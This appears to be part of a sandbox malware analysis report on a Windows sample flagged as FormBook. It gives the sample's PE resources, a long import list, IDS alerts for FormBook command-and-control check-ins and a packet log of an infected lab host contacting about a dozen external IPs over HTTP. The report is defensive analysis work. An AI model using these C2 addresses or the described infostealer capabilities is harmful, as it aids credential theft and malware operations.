RT_ICON | 0xda038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xda4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xda4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xdaa84 | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0xdb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xdb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xdbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xdc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xdc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xdc7b8 | 0xc575c | data | | | 1.0003165198640942
RT_GROUP_ICON | 0x1a1f14 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x1a1f8c | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x1a1fa0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x1a1fb4 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x1a1fc8 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x1a20a4 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
                              DLLImport
                              WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                              VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                              COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                              MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                              WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                              PSAPI.DLLGetProcessMemoryInfo
                              IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                              USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                              UxTheme.dllIsThemeActive
                              KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, 
lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll: GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll: EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll: GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll: GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll: DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll: CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll: CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system  Country where language is spoken  Map
English                         Great Britain
Timestamp                        SID      Signature                                 Severity  Source IP    Source Port  Dest IP          Dest Port  Protocol
2024-09-16T09:29:43.875285+0200  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.5  49711        47.57.185.227    80         TCP
2024-09-16T09:30:07.474250+0200  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.5  58649        89.58.49.1       80         TCP
2024-09-16T09:30:29.659742+0200  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.5  58653        154.23.184.240   80         TCP
2024-09-16T09:30:43.414357+0200  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.5  58657        85.159.66.93     80         TCP
2024-09-16T09:30:56.798181+0200  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.5  58661        185.173.111.76   80         TCP
2024-09-16T09:31:10.331009+0200  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.5  58665        203.161.43.228   80         TCP
2024-09-16T09:31:23.649305+0200  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.5  58669        161.97.168.245   80         TCP
2024-09-16T09:31:38.353891+0200  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.5  58673        172.96.191.39    80         TCP
2024-09-16T09:31:51.621138+0200  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.5  58677        104.21.20.125    80         TCP
2024-09-16T09:32:07.548753+0200  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.5  54907        43.242.202.169   80         TCP
2024-09-16T09:32:28.946660+0200  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.5  54911        104.207.148.137  80         TCP
2024-09-16T09:32:42.501756+0200  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.5  54915        185.104.29.12    80         TCP
2024-09-16T09:32:56.015666+0200  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.5  54919        65.21.196.90     80         TCP
2024-09-16T09:33:18.095887+0200  2050745  ET MALWARE FormBook CnC Checkin (GET) M5  1         192.168.2.5  54923        47.57.185.227    80         TCP
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Sep 16, 2024 09:29:42.972903967 CEST  49711        80         192.168.2.5      47.57.185.227
Sep 16, 2024 09:29:42.977763891 CEST  80           49711      47.57.185.227    192.168.2.5
Sep 16, 2024 09:29:42.978001118 CEST  49711        80         192.168.2.5      47.57.185.227
Sep 16, 2024 09:29:42.989041090 CEST  49711        80         192.168.2.5      47.57.185.227
Sep 16, 2024 09:29:42.994009018 CEST  80           49711      47.57.185.227    192.168.2.5
Sep 16, 2024 09:29:43.875068903 CEST  80           49711      47.57.185.227    192.168.2.5
Sep 16, 2024 09:29:43.875190973 CEST  80           49711      47.57.185.227    192.168.2.5
Sep 16, 2024 09:29:43.875284910 CEST  49711        80         192.168.2.5      47.57.185.227
Sep 16, 2024 09:29:43.896369934 CEST  49711        80         192.168.2.5      47.57.185.227
Sep 16, 2024 09:29:43.901299000 CEST  80           49711      47.57.185.227    192.168.2.5
Sep 16, 2024 09:29:58.991215944 CEST  58646        80         192.168.2.5      89.58.49.1
Sep 16, 2024 09:29:58.996145964 CEST  80           58646      89.58.49.1       192.168.2.5
Sep 16, 2024 09:29:58.996243954 CEST  58646        80         192.168.2.5      89.58.49.1
Sep 16, 2024 09:29:59.009834051 CEST  58646        80         192.168.2.5      89.58.49.1
Sep 16, 2024 09:29:59.014763117 CEST  80           58646      89.58.49.1       192.168.2.5
Sep 16, 2024 09:29:59.652570009 CEST  80           58646      89.58.49.1       192.168.2.5
Sep 16, 2024 09:29:59.652631044 CEST  80           58646      89.58.49.1       192.168.2.5
Sep 16, 2024 09:29:59.652684927 CEST  58646        80         192.168.2.5      89.58.49.1
Sep 16, 2024 09:30:00.526138067 CEST  58646        80         192.168.2.5      89.58.49.1
Sep 16, 2024 09:30:01.546165943 CEST  58647        80         192.168.2.5      89.58.49.1
Sep 16, 2024 09:30:01.551170111 CEST  80           58647      89.58.49.1       192.168.2.5
Sep 16, 2024 09:30:01.551278114 CEST  58647        80         192.168.2.5      89.58.49.1
Sep 16, 2024 09:30:01.563714027 CEST  58647        80         192.168.2.5      89.58.49.1
Sep 16, 2024 09:30:01.568695068 CEST  80           58647      89.58.49.1       192.168.2.5
Sep 16, 2024 09:30:02.206929922 CEST  80           58647      89.58.49.1       192.168.2.5
Sep 16, 2024 09:30:02.207448959 CEST  80           58647      89.58.49.1       192.168.2.5
Sep 16, 2024 09:30:02.207520962 CEST  58647        80         192.168.2.5      89.58.49.1
Sep 16, 2024 09:30:03.073026896 CEST  58647        80         192.168.2.5      89.58.49.1
Sep 16, 2024 09:30:04.091510057 CEST  58648        80         192.168.2.5      89.58.49.1
Sep 16, 2024 09:30:04.096515894 CEST  80           58648      89.58.49.1       192.168.2.5
Sep 16, 2024 09:30:04.096616983 CEST  58648        80         192.168.2.5      89.58.49.1
Sep 16, 2024 09:30:04.109462023 CEST  58648        80         192.168.2.5      89.58.49.1
Sep 16, 2024 09:30:04.114264965 CEST  80           58648      89.58.49.1       192.168.2.5
Sep 16, 2024 09:30:04.114428043 CEST  80           58648      89.58.49.1       192.168.2.5
Sep 16, 2024 09:30:04.733069897 CEST  80           58648      89.58.49.1       192.168.2.5
Sep 16, 2024 09:30:04.733141899 CEST  80           58648      89.58.49.1       192.168.2.5
Sep 16, 2024 09:30:04.733196020 CEST  58648        80         192.168.2.5      89.58.49.1
Sep 16, 2024 09:30:05.648406029 CEST  58648        80         192.168.2.5      89.58.49.1
Sep 16, 2024 09:30:06.654176950 CEST  58649        80         192.168.2.5      89.58.49.1
Sep 16, 2024 09:30:06.731545925 CEST  80           58649      89.58.49.1       192.168.2.5
Sep 16, 2024 09:30:06.731729031 CEST  58649        80         192.168.2.5      89.58.49.1
Sep 16, 2024 09:30:06.738957882 CEST  58649        80         192.168.2.5      89.58.49.1
Sep 16, 2024 09:30:06.743733883 CEST  80           58649      89.58.49.1       192.168.2.5
Sep 16, 2024 09:30:07.474097967 CEST  80           58649      89.58.49.1       192.168.2.5
Sep 16, 2024 09:30:07.474126101 CEST  80           58649      89.58.49.1       192.168.2.5
Sep 16, 2024 09:30:07.474144936 CEST  80           58649      89.58.49.1       192.168.2.5
Sep 16, 2024 09:30:07.474250078 CEST  58649        80         192.168.2.5      89.58.49.1
Sep 16, 2024 09:30:07.476799965 CEST  58649        80         192.168.2.5      89.58.49.1
Sep 16, 2024 09:30:07.481600046 CEST  80           58649      89.58.49.1       192.168.2.5
Sep 16, 2024 09:30:20.818113089 CEST  58650        80         192.168.2.5      154.23.184.240
Sep 16, 2024 09:30:20.823070049 CEST  80           58650      154.23.184.240   192.168.2.5
Sep 16, 2024 09:30:20.823195934 CEST  58650        80         192.168.2.5      154.23.184.240
Sep 16, 2024 09:30:20.836724997 CEST  58650        80         192.168.2.5      154.23.184.240
Sep 16, 2024 09:30:20.841516972 CEST  80           58650      154.23.184.240   192.168.2.5
Sep 16, 2024 09:30:21.735294104 CEST  80           58650      154.23.184.240   192.168.2.5
Sep 16, 2024 09:30:21.735354900 CEST  80           58650      154.23.184.240   192.168.2.5
Sep 16, 2024 09:30:21.735481977 CEST  58650        80         192.168.2.5      154.23.184.240
Sep 16, 2024 09:30:22.355849028 CEST  58650        80         192.168.2.5      154.23.184.240
Sep 16, 2024 09:30:23.372821093 CEST  58651        80         192.168.2.5      154.23.184.240
Sep 16, 2024 09:30:23.634933949 CEST  80           58651      154.23.184.240   192.168.2.5
Sep 16, 2024 09:30:23.635024071 CEST  58651        80         192.168.2.5      154.23.184.240
Sep 16, 2024 09:30:23.650276899 CEST  58651        80         192.168.2.5      154.23.184.240
Sep 16, 2024 09:30:23.655111074 CEST  80           58651      154.23.184.240   192.168.2.5
Sep 16, 2024 09:30:24.552614927 CEST  80           58651      154.23.184.240   192.168.2.5
Sep 16, 2024 09:30:24.552628994 CEST  80           58651      154.23.184.240   192.168.2.5
Sep 16, 2024 09:30:24.552709103 CEST  58651        80         192.168.2.5      154.23.184.240
Sep 16, 2024 09:30:25.166840076 CEST  58651        80         192.168.2.5      154.23.184.240
Sep 16, 2024 09:30:26.185045004 CEST  58652        80         192.168.2.5      154.23.184.240
Sep 16, 2024 09:30:26.190017939 CEST  80           58652      154.23.184.240   192.168.2.5
Sep 16, 2024 09:30:26.190115929 CEST  58652        80         192.168.2.5      154.23.184.240
Sep 16, 2024 09:30:26.199429035 CEST  58652        80         192.168.2.5      154.23.184.240
Sep 16, 2024 09:30:26.206142902 CEST  80           58652      154.23.184.240   192.168.2.5
Sep 16, 2024 09:30:26.206161022 CEST  80           58652      154.23.184.240   192.168.2.5
Sep 16, 2024 09:30:27.097513914 CEST  80           58652      154.23.184.240   192.168.2.5
Sep 16, 2024 09:30:27.097531080 CEST  80           58652      154.23.184.240   192.168.2.5
Sep 16, 2024 09:30:27.097738028 CEST  58652        80         192.168.2.5      154.23.184.240
Sep 16, 2024 09:30:27.713773012 CEST  58652        80         192.168.2.5      154.23.184.240
Sep 16, 2024 09:30:28.732743979 CEST  58653        80         192.168.2.5      154.23.184.240
Sep 16, 2024 09:30:28.737752914 CEST  80           58653      154.23.184.240   192.168.2.5
Sep 16, 2024 09:30:28.737916946 CEST  58653        80         192.168.2.5      154.23.184.240
Sep 16, 2024 09:30:28.745003939 CEST  58653        80         192.168.2.5      154.23.184.240
Sep 16, 2024 09:30:28.749850035 CEST  80           58653      154.23.184.240   192.168.2.5
Sep 16, 2024 09:30:29.659447908 CEST  80           58653      154.23.184.240   192.168.2.5
Sep 16, 2024 09:30:29.659468889 CEST  80           58653      154.23.184.240   192.168.2.5
Sep 16, 2024 09:30:29.659742117 CEST  58653        80         192.168.2.5      154.23.184.240
Sep 16, 2024 09:30:29.662379980 CEST  58653        80         192.168.2.5      154.23.184.240
Sep 16, 2024 09:30:29.667251110 CEST  80           58653      154.23.184.240   192.168.2.5
Sep 16, 2024 09:30:34.768515110 CEST  58654        80         192.168.2.5      85.159.66.93
Sep 16, 2024 09:30:34.778500080 CEST  80           58654      85.159.66.93     192.168.2.5
Sep 16, 2024 09:30:34.778574944 CEST  58654        80         192.168.2.5      85.159.66.93
Sep 16, 2024 09:30:34.790605068 CEST  58654        80         192.168.2.5      85.159.66.93
Sep 16, 2024 09:30:34.800605059 CEST  80           58654      85.159.66.93     192.168.2.5
Sep 16, 2024 09:30:36.291996956 CEST  58654        80         192.168.2.5      85.159.66.93
Sep 16, 2024 09:30:36.298460960 CEST  80           58654      85.159.66.93     192.168.2.5
Sep 16, 2024 09:30:36.299251080 CEST  58654        80         192.168.2.5      85.159.66.93
Sep 16, 2024 09:30:37.342355013 CEST  58655        80         192.168.2.5      85.159.66.93
Sep 16, 2024 09:30:37.347292900 CEST  80           58655      85.159.66.93     192.168.2.5
Sep 16, 2024 09:30:37.347362995 CEST  58655        80         192.168.2.5      85.159.66.93
Sep 16, 2024 09:30:37.478934050 CEST  58655        80         192.168.2.5      85.159.66.93
Sep 16, 2024 09:30:37.483859062 CEST  80           58655      85.159.66.93     192.168.2.5
Sep 16, 2024 09:30:38.994982004 CEST  58655        80         192.168.2.5      85.159.66.93
Sep 16, 2024 09:30:39.001595974 CEST  80           58655      85.159.66.93     192.168.2.5
Sep 16, 2024 09:30:39.001671076 CEST  58655        80         192.168.2.5      85.159.66.93
Sep 16, 2024 09:30:40.037658930 CEST  58656        80         192.168.2.5      85.159.66.93
Sep 16, 2024 09:30:40.042720079 CEST  80           58656      85.159.66.93     192.168.2.5
Sep 16, 2024 09:30:40.046017885 CEST  58656        80         192.168.2.5      85.159.66.93
Sep 16, 2024 09:30:40.133606911 CEST  58656        80         192.168.2.5      85.159.66.93
Sep 16, 2024 09:30:40.138634920 CEST  80           58656      85.159.66.93     192.168.2.5
Sep 16, 2024 09:30:40.138672113 CEST  80           58656      85.159.66.93     192.168.2.5
Sep 16, 2024 09:30:41.635618925 CEST  58656        80         192.168.2.5      85.159.66.93
Sep 16, 2024 09:30:41.640949965 CEST  80           58656      85.159.66.93     192.168.2.5
Sep 16, 2024 09:30:41.641033888 CEST  58656        80         192.168.2.5      85.159.66.93
Sep 16, 2024 09:30:42.698194027 CEST  58657        80         192.168.2.5      85.159.66.93
Sep 16, 2024 09:30:42.703401089 CEST  80           58657      85.159.66.93     192.168.2.5
Sep 16, 2024 09:30:42.707365990 CEST  58657        80         192.168.2.5      85.159.66.93
Sep 16, 2024 09:30:42.727197886 CEST  58657        80         192.168.2.5      85.159.66.93
Sep 16, 2024 09:30:42.732373953 CEST  80           58657      85.159.66.93     192.168.2.5
Sep 16, 2024 09:30:43.414175987 CEST  80           58657      85.159.66.93     192.168.2.5
Sep 16, 2024 09:30:43.414244890 CEST  80           58657      85.159.66.93     192.168.2.5
Sep 16, 2024 09:30:43.414356947 CEST  58657        80         192.168.2.5      85.159.66.93
Sep 16, 2024 09:30:43.417433023 CEST  58657        80         192.168.2.5      85.159.66.93
Sep 16, 2024 09:30:43.422312975 CEST  80           58657      85.159.66.93     192.168.2.5
Sep 16, 2024 09:30:48.475464106 CEST  58658        80         192.168.2.5      185.173.111.76
Sep 16, 2024 09:30:48.480320930 CEST  80           58658      185.173.111.76   192.168.2.5
Sep 16, 2024 09:30:48.482285023 CEST  58658        80         192.168.2.5      185.173.111.76
Sep 16, 2024 09:30:48.493576050 CEST  58658        80         192.168.2.5      185.173.111.76
Sep 16, 2024 09:30:48.498589039 CEST  80           58658      185.173.111.76   192.168.2.5
Sep 16, 2024 09:30:49.151998997 CEST  80           58658      185.173.111.76   192.168.2.5
Sep 16, 2024 09:30:49.152026892 CEST  80           58658      185.173.111.76   192.168.2.5
Sep 16, 2024 09:30:49.152067900 CEST  58658        80         192.168.2.5      185.173.111.76
Sep 16, 2024 09:30:49.995186090 CEST  58658        80         192.168.2.5      185.173.111.76
Sep 16, 2024 09:30:51.013794899 CEST  58659        80         192.168.2.5      185.173.111.76
Sep 16, 2024 09:30:51.019870996 CEST  80           58659      185.173.111.76   192.168.2.5
Sep 16, 2024 09:30:51.019938946 CEST  58659        80         192.168.2.5      185.173.111.76
Sep 16, 2024 09:30:51.032973051 CEST  58659        80         192.168.2.5      185.173.111.76
Sep 16, 2024 09:30:51.037904024 CEST  80           58659      185.173.111.76   192.168.2.5
Sep 16, 2024 09:30:51.696297884 CEST  80           58659      185.173.111.76   192.168.2.5
Sep 16, 2024 09:30:51.696324110 CEST  80           58659      185.173.111.76   192.168.2.5
Sep 16, 2024 09:30:51.696491003 CEST  58659        80         192.168.2.5      185.173.111.76
Sep 16, 2024 09:30:52.541999102 CEST  58659        80         192.168.2.5      185.173.111.76
Sep 16, 2024 09:30:53.562921047 CEST  58660        80         192.168.2.5      185.173.111.76
Sep 16, 2024 09:30:53.567819118 CEST  80           58660      185.173.111.76   192.168.2.5
Sep 16, 2024 09:30:53.567890882 CEST  58660        80         192.168.2.5      185.173.111.76
Sep 16, 2024 09:30:53.587518930 CEST  58660        80         192.168.2.5      185.173.111.76
Sep 16, 2024 09:30:53.592363119 CEST  80           58660      185.173.111.76   192.168.2.5
Sep 16, 2024 09:30:53.592489004 CEST  80           58660      185.173.111.76   192.168.2.5
Sep 16, 2024 09:30:54.238173008 CEST  80           58660      185.173.111.76   192.168.2.5
Sep 16, 2024 09:30:54.238190889 CEST  80           58660      185.173.111.76   192.168.2.5
Sep 16, 2024 09:30:54.238383055 CEST  58660        80         192.168.2.5      185.173.111.76
Sep 16, 2024 09:30:55.104497910 CEST  58660        80         192.168.2.5      185.173.111.76
Sep 16, 2024 09:30:56.126584053 CEST  58661        80         192.168.2.5      185.173.111.76
Sep 16, 2024 09:30:56.131792068 CEST  80           58661      185.173.111.76   192.168.2.5
Sep 16, 2024 09:30:56.131928921 CEST  58661        80         192.168.2.5      185.173.111.76
Sep 16, 2024 09:30:56.139600992 CEST  58661        80         192.168.2.5      185.173.111.76
Sep 16, 2024 09:30:56.144448042 CEST  80           58661      185.173.111.76   192.168.2.5
Sep 16, 2024 09:30:56.798033953 CEST  80           58661      185.173.111.76   192.168.2.5
Sep 16, 2024 09:30:56.798058033 CEST  80           58661      185.173.111.76   192.168.2.5
Sep 16, 2024 09:30:56.798181057 CEST  58661        80         192.168.2.5      185.173.111.76
Sep 16, 2024 09:30:56.801677942 CEST  58661        80         192.168.2.5      185.173.111.76
Sep 16, 2024 09:30:56.806463003 CEST  80           58661      185.173.111.76   192.168.2.5
Sep 16, 2024 09:31:02.099574089 CEST  58662        80         192.168.2.5      203.161.43.228
Sep 16, 2024 09:31:02.104437113 CEST  80           58662      203.161.43.228   192.168.2.5
Sep 16, 2024 09:31:02.105413914 CEST  58662        80         192.168.2.5      203.161.43.228
Sep 16, 2024 09:31:02.117590904 CEST  58662        80         192.168.2.5      203.161.43.228
Sep 16, 2024 09:31:02.122349977 CEST  80           58662      203.161.43.228   192.168.2.5
Sep 16, 2024 09:31:02.718168974 CEST  80           58662      203.161.43.228   192.168.2.5
Sep 16, 2024 09:31:02.718261003 CEST  80           58662      203.161.43.228   192.168.2.5
Sep 16, 2024 09:31:02.719293118 CEST  58662        80         192.168.2.5      203.161.43.228
Sep 16, 2024 09:31:03.621135950 CEST  58662        80         192.168.2.5      203.161.43.228
Sep 16, 2024 09:31:04.638406038 CEST  58663        80         192.168.2.5      203.161.43.228
Sep 16, 2024 09:31:04.643471003 CEST  80           58663      203.161.43.228   192.168.2.5
Sep 16, 2024 09:31:04.643599033 CEST  58663        80         192.168.2.5      203.161.43.228
Sep 16, 2024 09:31:04.654110909 CEST  58663        80         192.168.2.5      203.161.43.228
Sep 16, 2024 09:31:04.658951998 CEST  80           58663      203.161.43.228   192.168.2.5
Sep 16, 2024 09:31:05.234532118 CEST  80           58663      203.161.43.228   192.168.2.5
Sep 16, 2024 09:31:05.235662937 CEST  80           58663      203.161.43.228   192.168.2.5
Sep 16, 2024 09:31:05.235723019 CEST  58663        80         192.168.2.5      203.161.43.228
Sep 16, 2024 09:31:06.171861887 CEST  58663        80         192.168.2.5      203.161.43.228
